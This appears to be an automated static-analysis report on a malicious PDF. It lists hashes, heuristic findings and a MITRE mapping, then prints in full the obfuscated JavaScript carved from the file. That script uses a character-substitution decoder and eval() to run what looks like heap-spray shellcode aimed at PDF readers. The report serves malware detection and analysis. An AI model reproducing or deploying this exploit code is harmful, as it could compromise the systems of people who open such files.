Malicious PDF — malware analysis report

Static analysis result for SHA-256 a29c9344bcba185d…

MALICIOUS

PDF

9.5 KB Created: 2010-05-12 02:24:26 Authoring application: rl4WuvZmq (via TBprhnLx) First seen: 2026-05-10
MD5: 0c222564a5c9666bbfdecf1f8bc75d54 SHA-1: 7ac5e69e9eb28205857568760e5cfca6a5933391 SHA-256: a29c9344bcba185dbacc2d26f8fe6f6d84667ea8adfed0297167dd2367a282fd
166 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by PDF_JAVASCRIPT and PDF_JS heuristics. A high-severity PDF_EVAL heuristic firing suggests the use of eval(), a common technique for obfuscating malicious JavaScript. The extracted JavaScript stream, javascript_obj0007_000.js, is likely responsible for executing arbitrary code, potentially downloading a second-stage payload. The obfuscation and use of eval() point towards a malicious intent, though the specific family cannot be determined.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    tf(FPBFQ5GIK(c8q{cykcUHIF==FHoz\nFFFFmGe9rC3e6xh9L9h8F=Fi4(f7xV(Q\"%iMyMy%iMyMy%iMyMy%iJDO0%iyy>0%ijjq6%isJ06%isJJb%iODyy%iOHMy%iO0D<%iOsJ>%iDDOq%iDDDD%is0KD%icDMO%iODOD%ijMOD%iOy<D%i6DjM%iMHDy%i6DjM%ijOOK%iODJy%iODO0%ijMOD%i06Jy%ijbsK%iOb<b%iJKJy%iODbb%iODOD%i<<jj%i06O0%iKKsK%ij>bb%iJKOb%iODbD%iODOD%i<<jj%i06OK%iq<sK%ibJ>D%iJKHc%iODJc%iODOD%i<<jj%i06Oy%iJJsK%iJDHb%iJKsD%iODy0%iODOD%i<<jj%i06DD%iHOsK%iJ<6j%iJK>K%iODH6%iODOD%i<<jj%i<DD0%icKjD%i6<Hq%ijjb>%iDK<<%iOsJj%iODOO%i0bOD%i6<jj%ijMq0%iO0<<% …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0007_000.js pdf-javascript-stream PDF /JS object 7 at offset 0x241 8240 bytes
SHA-256: 290eb083334b8627c05895b29bddc0b6f2834054a0268de6b2be8a3ce9ec80fe
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). 120 of 172 identifiers look randomly generated (e.g. 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmn') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
function FK8erPjpgErJmaxkrate(FK8erPjpgErJmaxkrate,z9nkp9mpllvw) {var y3NowC=FK8erPjpgErJmaxkrate. substr (z9nkp9mpllvw, 1);return y3NowC;}/*QmUUbE|G7botLsx|A290b7ef*/function JCHiyXmmZJevr0R6(AMqHx1DIAYjJ5SS) {/*YtZLvfbX0vz5852ak|lSZzKRyAtvfPh4|AFtchHTS6OR2HrctTvII*/var Z1wwdYLn37UtPQWGdDOQ = new String("<>(){} .,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789");/*a66JsbYPVXMbHp8O8RL[iETQgDjS]rNmoJvWl*//*m7hyYod|AcoEoNI8dp|C7OuK*/var RY4p7ElPXjpOVcsuoVn /*YUlv6wX3TMS8qp1IT5[gDv9txCqCw12KMe5I]TCkfUiL9Z*/= new String("XSQoz.FuR<0qcODda8gh9YN WpmlvA,}3LTxE7e(BGkP{nt54)V21friCZUIwJbHyM>jKs6");/*SUHzY2yHq0|snqly2FtBVDD5jXdvX|FpNMemFTuwKjexPGlIL*/for(qX17t7axLrrdFl=0;qX17t7axLrrdFl<Z1wwdYLn37UtPQWGdDOQ.length;qX17t7axLrrdFl++) {if(AMqHx1DIAYjJ5SS == FK8erPjpgErJmaxkrate(RY4p7ElPXjpOVcsuoVn, qX17t7axLrrdFl)) {/*JhZNc8l6t8[zoDBIpGca3m9YaOeCX]YgMxupwVmgTbV7f*/return FK8erPjpgErJmaxkrate(Z1wwdYLn37UtPQWGdDOQ, qX17t7axLrrdFl);/*GLejlXMkvm <PpN4DuH0exnzZJJ1eH]AOhWxJt9ue*/}}return AMqHx1DIAYjJ5SS;}/*jtRxoUhwLBjz19[B0dINVXvrK4aKo5wOpDB]YiGkkqZbpY*//*g1ltN8f4JZVT|RFT6JU|h3WIeCi5r*/var PezzKV31ffSSFA = new String;var zfMpe0PJ02ybdjOD = new String("\nCx1F24g9NjT}wEk6JG<9F=F4(ZF<11xIQo;\nCx1FIiGn8lrfBjMDN0{y;\nBi47rP)4FlM 9JIf6Txa{amjjQUt2(On}r2TJctrd{RF4(jK7IO0L}iVUwCgoz\nFFZkPt(FQUt2(On}r2TJctrd{ut(4GrkF*FHFXF4(jK7IO0L}iVUwCgoz\nFFFFUt2(On}r2TJctrd{F+=FUt2(On}r2TJctrd{;\nFF.\nFFUt2(On}r2TJctrd{F=FUt2(On}r2TJctrd{ufiEfr1P4GQJRF4(jK7IO0L}iVUwCgF/FHo;\nFF1(ri14FUt2(On}r2TJctrd{;\n.\nBi47rP)4FT5Iw},rYjyT2C2xfQ5GIK(c8q{cykcUHIoz\nFFCx1F{wIdA17TrqpVybk}F=FJUJ7J7J7J7;\nFFCx1FmGe9rC3e6xh9L9h8F=Fi4(f7xV(Q\"%iMyMy%iMyMy%iMyMy%iJDO0%iyy>0%ijjq6%isJ06%isJJb%iODyy%iOHMy%iO0D<%iOsJ>%iDDOq%iDDDD%is0KD%icDMO%iODOD%ijMOD%iOy<D%i6DjM%iMHDy%i6DjM%ijOOK%iODJy%iODO0%ijMOD%i06Jy%ijbsK%iOb<b%iJKJy%iODbb%iODOD%i<<jj%i06O0%iKKsK%ij>bb%iJKOb%iODbD%iODOD%i<<jj%i06OK%iq<sK%ibJ>D%iJKHc%iODJc%iODOD%i<<jj%i06Oy%iJJsK%iJDHb%iJKsD%iODy0%iODOD%i<<jj%i06DD%iHOsK%iJ<6j%iJK>K%iODH6%iODOD%i<<jj%i<DD0%icKjD%i6<Hq%ijjb>%iDK<<%iOsJj%iODOO%i0bOD%i6<jj%ijMq0%iO0<<%iOOs>%ijM0j%iDK0<%iJK06%iODjM%iODOD%isK0D%iD>c6%i6DqJ%iKsJK%iODOD%ijjOD%iDy<<%iH<jM%iHDjq%ijj0D%iqD<<%ibJsK%iODOD%i0DOD%i<<jM%is>D0%i0jOc%i0<jM%iJKDK%iODsO%iODOD%i<<Oq%iHsqD%i0yOD%iqb6b%iHss<%iO0<D%is<6K%iODOD%i6<bJ%ijMqD%iOy<<%iOOs>%ijM0j%iDK0<%i<DJK%iODOD%is>OD%i0KOs%i<<Oq%icqq0%i0qyM%ibJ0q%iqD6<%i0q0D%i<<jM%is>Dy%i0jO<%i0<jM%iJKDK%iODqq%iODOD%iODs>%i6<bJ%ijMqD%iOK<<%iOcs>%ijM0j%iDK0<%iDDJK%iODOD%is>OD%ijMbJ%iDD<<%iOOs>%ijM0j%iDK0<%iODJK%iODOD%i<OOD%i0c0M%iJOOq%iJOOq%iJOOq%iJOOq%iJyjq%i0>O0%ijM0q%iJcy>%i0cbs%iJDbJ%ijM0<%ijMJy%iOK6H%i0HjM%i06Oy%i6qjM%ijMcy%iDb60%iOq6K%i06bq%i66jM%iOqqD%icqbq%i<jHj%iMH<O%iHqOq%icq06%iOJb6%iDD>b%ibcc>%iOK60%iHbHO%iOqOH%i<Dbc%ibOJM%ibbcM%i6<0b%i0>J<%iJMjM%i0>jM%iOqq0%is6yH%iOyjM%ijM<M%iDy0>%iyHOq%iO0jM%iOqjM%i0bH<%iHc0H%iODOK%ib0JK%ibJbb%i0<bJ%i<y0c%i<J<H%iOD<b%iKMjs%iKJKM%iHDy<%ijMHD%ijcyJ%iybjb%iKyjO%ij6HO%ijjjO%iHDjD%ijqjH%ijKjD%ijqHD%ijbjD%iHOjM%ijsKJ%iyDKJ%ijMj6%iy6yc%iJJy>\"o;\nFFPBFQ5GIK(c8q{cykcUHIF==Fboz\nFFFF{wIdA17TrqpVybk}F=FJUyJyJyJyJ;\nFFFFmGe9rC3e6xh9L9h8F=Fi4(f7xV(Q\"%iMyMy%iMyMy%iMyMy%iJDO0%iyy>0%ijjq6%isJ06%isJJb%iODyy%iOHMy%iO0D<%iOsJ>%iDDOq%iDDDD%is0KD%icDMO%iODOD%ijMOD%iOy<D%i6DjM%iMHDy%i6DjM%ijOOK%iODJy%iODO0%ijMOD%i06Jy%ijbsK%iOb<b%iJKJy%iODbb%iODOD%i<<jj%i06O0%iKKsK%ij>bb%iJKOb%iODbD%iODOD%i<<jj%i06OK%iq<sK%ibJ>D%iJKHc%iODJc%iODOD%i<<jj%i06Oy%iJJsK%iJDHb%iJKsD%iODy0%iODOD%i<<jj%i06DD%iHOsK%iJ<6j%iJK>K%iODH6%iODOD%i<<jj%i<DD0%icKjD%i6<Hq%ijjb>%iDK<<%iOsJj%iODOO%i0bOD%i6<jj%ijMq0%iO0<<%iOOs>%ijM0j%iDK0<%iJK06%iODjM%iODOD%isK0D%iD>c6%i6DqJ%iKsJK%iODOD%ijjOD%iDy<<%iH<jM%iHDjq%ijj0D%iqD<<%ibJsK%iODOD%i0DOD%i<<jM%is>D0%i0jOc%i0<jM%iJKDK%iODsO%iODOD%i<<Oq%iHsqD%i0yOD%iqb6b%iHss<%iO0<D%is<6K%iODOD%i6<bJ%ijMqD%iOy<<%iOOs>%ijM0j%iDK0<%i<DJK%iODOD%is>OD%i0KOs%i<<Oq%icqq0%i0qyM%ibJ0q%iqD6<%i0q0D%i<<jM%is>Dy%i0jO<%i0<jM%iJKDK%iODqq%iODOD%iODs>%i6<bJ%ijMqD%iOK<<%iOcs>%ijM0j%iDK0<%iDDJK%iODOD%is>OD%ijMbJ%iDD<<%iOOs>%ijM0j%iDK0<%iODJK%iODOD%i<OOD%i0c0M%iJOOq%iJOOq%iJOOq%iJOOq%iJyjq%i0>O0%ijM0q%iJcy>%i0cbs%iJDbJ%ijM0<%ijMJy%iOK6H%i0HjM%i06Oy%i6qjM%ijMcy%iDb60%iOq6K%i06bq%i66jM%iOqqD%icqbq%i<jHj%iMH<O%iHqOq%icq06%iOJb6%iDD>b%ibcc>%iOK60%iHbHO%iOqOH%i<Dbc%ibOJM%ibbcM%i6<0b%i0>J<%iJMjM%i0>jM%iOqq0%is6yH%iOyjM%ijM<M%iDy0>%iyHOq%iO0jM%iOqjM%i0bH<%iHc0H%iODOK%ib0JK%ibJbb%i0<bJ%i<y0c%i<J<H%iOD<b%iKMjs%iKJKM%iHDy<%ijMHD%ijcyJ%iybjb%iKyjO%ij6HO%ijjjO%iHDjD%ijqjH%ijKjD%ijqHD%ijbjD%iHOjM%ijsKJ%iyDKJ%ijMj6%iy6yc%iJJy>\"o;\nFF.\nFF(tf(FPBFQ5GIK(c8q{cykcUHIF==FHoz\nFFFFmGe9rC3e6xh9L9h8F=Fi4(f7xV(Q\"%iMyMy%iMyMy%iMyMy%iJDO0%iyy>0%ijjq6%isJ06%isJJb%iODyy%iOHMy%iO0D<%iOsJ>%iDDOq%iDDDD%is0KD%icDMO%iODOD%ijMOD%iOy<D%i6DjM%iMHDy%i6DjM%ijOOK%iODJy%iODO0%ijMOD%i06Jy%ijbsK%iOb<b%iJKJy%iODbb%iODOD%i<<jj%i06O0%iKKsK%ij>bb%iJKOb%iODbD%iODOD%i<<jj%i06OK%iq<sK%ibJ>D%iJKHc%iODJc%iODOD%i<<jj%i06Oy%iJJsK%iJDHb%iJKsD%iODy0%iODOD%i<<jj%i06DD%iHOsK%iJ<6j%iJK>K%iODH6%iODOD%i<<jj%i<DD0%icKjD%i6<Hq%ijjb>%iDK<<%iOsJj%iODOO%i0bOD%i6<jj%ijMq0%iO0<<%iOOs>%ijM0j%iDK0<%iJK06%iODjM%iODOD%isK0D%iD>c6%i6DqJ%iKsJK%iODOD%ijjOD%iDy<<%iH<jM%iHDjq%ijj0D%iqD<<%ibJsK%iODOD%i0DOD%i<<jM%is>D0%i0jOc%i0<jM%iJKDK%iODsO%iODOD%i<<Oq%iHsqD%i0yOD%iqb6b%iHss<%iO0<D%is<6K%iODOD%i6<bJ%ijMqD%iOy<<%iOOs>%ijM0j%iDK0<%i<DJK%iODOD%is>OD%i0KOs%i<<Oq%icqq0%i0qyM%ibJ0q%iqD6<%i0q0D%i<<jM%is>Dy%i0jO<%i0<jM%iJKDK%iODqq%iODOD%iODs>%i6<bJ%ijMqD%iOK<<%iOcs>%ijM0j%iDK0<%iDDJK%iODOD%is>OD%ijMbJ%iDD<<%iOOs>%ijM0j%iDK0<%iODJK%iODOD%i<OOD%i0c0M%iJOOq%iJOOq%iJOOq%iJOOq%iJyjq%i0>O0%ijM0q%iJcy>%i0cbs%iJDbJ%ijM0<%ijMJy%iOK6H%i0HjM%i06Oy%i6qjM%ijMcy%iDb60%iOq6K%i06bq%i66jM%iOqqD%icqbq%i<jHj%iMH<O%iHqOq%icq06%iOJb6%iDD>b%ibcc>%iOK60%iHbHO%iOqOH%i<Dbc%ibOJM%ibbcM%i6<0b%i0>J<%iJMjM%i0>jM%iOqq0%is6yH%iOyjM%ijM<M%iDy0>%iyHOq%iO0jM%iOqjM%i0bH<%iHc0H%iODOK%ib0JK%ibJbb%i0<bJ%i<y0c%i<J<H%iOD<b%iKMjs%iKJKM%iHDy<%ijMHD%ijcyJ%iybjb%iKyjO%ij6HO%ijjjO%iHDjD%ijqjH%ijKjD%ijqHD%ijbjD%iHOjM%ijsKJ%iyDKJ%ijMj6%iy6yc%iJJy>\"o;\nFF.\nFFCx1FWgL2<0p>N2rW1EZLF=FJUMJJJJJ;\nFFCx1FkTr0,m)(H6bTAh12F=FmGe9rC3e6xh9L9h8ut(4GrkF*FH;\nFFCx1F4(jK7IO0L}iVUwCgF=FWgL2<0p>N2rW1EZLF-FQkTr0,m)(H6bTAh12F+FJUyso;\nFFCx1FUt2(On}r2TJctrd{F=Fi4(f7xV(Q\"%i6J6J%i6J6J\"o;\nFFUt2(On}r2TJctrd{F=FlM 9JIf6Txa{amjjQUt2(On}r2TJctrd{RF4(jK7IO0L}iVUwCgo;\nFFCx1FZpG)EKrwU4 ) 9YGF=FQ{wIdA17TrqpVybk}F-FJUMJJJJJoF/FWgL2<0p>N2rW1EZL;\nFFB)1FQCx1F(DfpGGjPVjahpJ<>F=FJ;F(DfpGGjPVjahpJ<>FXFZpG)EKrwU4 ) 9YG;F(DfpGGjPVjahpJ<>F++Foz\nFFFF24g9NjT}wEk6JG<9[(DfpGGjPVjahpJ<>]F=FUt2(On}r2TJctrd{F+FmGe9rC3e6xh9L9h8;\nFF.\n.\nBi47rP)4Fm2f0U5<iTTPUij(2Qoz\nFFCx1FA}aHcY{ymHYf<3ZnF=FJ;\nFFCx1FWVZ9EKD<GUsEy5mNF=FxVVuCP(Z(1,(1fP)4ur)lr1P4GQo;\nFFxVVu7t(x1vP5( irQIiGn8lrfBjMDN0{yo;\n\nFFPBFQWVZ9EKD<GUsEy5mNFXFKuboz\nFFFFT5Iw},rYjyT2C2xfQJo;\nFFFFCx1FgPW,j6L3<CW9l9j2F=Fi4(f7xV(Q\"%iJ7J7%iJ7J7\"o;\nFFFFZkPt(FQgPW,j6L3<CW9l9j2ut(4GrkFXFMM6>HogPW,j6L3<CW9l9j2F+=FgPW,j6L3<CW9l9j2;\nFFFFrkPfFu7)ttxElr)1(F=Fq)ttxEu7)tt(7rO5xPt84B)Qz\nFFFFFFfiE{F:F\"\"RF5fGF:FgPW,j6L3<CW9l9j2\nFFFF.\nFFFFo;\nFF.\nPBFQWVZ9EKD<GUsEy5mNFS=F6oz\nFFFFr1IFz\nPBFQxVVue)7uq)ttxEuG(r87)4oz\nFFFFFFFFT5Iw},rYjyT2C2xfQHo;\nFFFFFFFFCx1F(y0t6mZ)W>Wm21VJF=Fi4(f7xV(Q\"%J6\"o;\nFFFFFFFFZkPt(FQ(y0t6mZ)W>Wm21VJut(4GrkFXFJUMJJJo(y0t6mZ)W>Wm21VJF+=F(y0t6mZ)W>Wm21VJ;\nFFFFFFFF(y0t6mZ)W>Wm21VJF=F\"Nu\"F+F(y0t6mZ)W>Wm21VJ;\nxVVue)7uq)ttxEuG(r87)4Q(y0t6mZ)W>Wm21VJo;\nFFFFFFFFA}aHcY{ymHYf<3ZnF=Fb;\nFFFFFF.\nFFFFFF(tf(Fz\nFFFFFFFFA}aHcY{ymHYf<3ZnF=Fb;\nFFFFFF.\nFFFF.\nFFFF7xr7kFQ(oz\nFFFFFFA}aHcY{ymHYf<3ZnF=Fb;\nFFFF.\nFFFFPBFQA}aHcY{ymHYf<3ZnF==Fboz\nFFFFFFPBFQQWVZ9EKD<GUsEy5mNFS=FKub&&FWVZ9EKD<GUsEy5mNFXF6ooz\nFFFFFFFFT5Iw},rYjyT2C2xfQbo;\nFFFFFFFFCx1F0OBBNcqLJ7r7Uwv6F=F\"bH666666666666666666\";\nFFFFFFFFB)1FQ0Bi<K2I,i UnD5iVF=FJ;F0Bi<K2I,i UnD5iVFXFHKj;F0Bi<K2I,i UnD5iVF++Foz\nFFFFFFFFFF0OBBNcqLJ7r7Uwv6F+=F\"s\";\nFFFFFFFF.\nFFFFFFFFirPtuV1P4rBQ\"%M>JJJB\"RF0OBBNcqLJ7r7Uwv6o;\nFFFFFF.\nFFFF.\nFF.\n.\nxVVunT,W4PUZh2T8Vyp1F=Fm2f0U5<iTTPUij(2;\nIiGn8lrfBjMDN0{yF=FxVVuf(rvP5( irQ\"xVVunT,W4PUZh2T8Vyp1Qo\"RFbJo;\n");/*YOz97C8c7H2Ta7kgQgpl{NeIV8K4421SGqSEtR}qZZAzWkVmGAO3*//*sBkrLemE|AKDNOwfwd4|euiEFLLG*/for(t2o3OivtDECJEv8j8o=0;t2o3OivtDECJEv8j8o<zfMpe0PJ02ybdjOD.length;t2o3OivtDECJEv8j8o++)PezzKV31ffSSFA += JCHiyXmmZJevr0R6(FK8erPjpgErJmaxkrate(zfMpe0PJ02ybdjOD,t2o3OivtDECJEv8j8o));eval(PezzKV31ffSSFA);/*EUIF40RZcWw[gzlvmHiGBuk]Sp1e0845TDBO3TnWp*/

Open this report in the interactive analyzer, or submit your own file for analysis.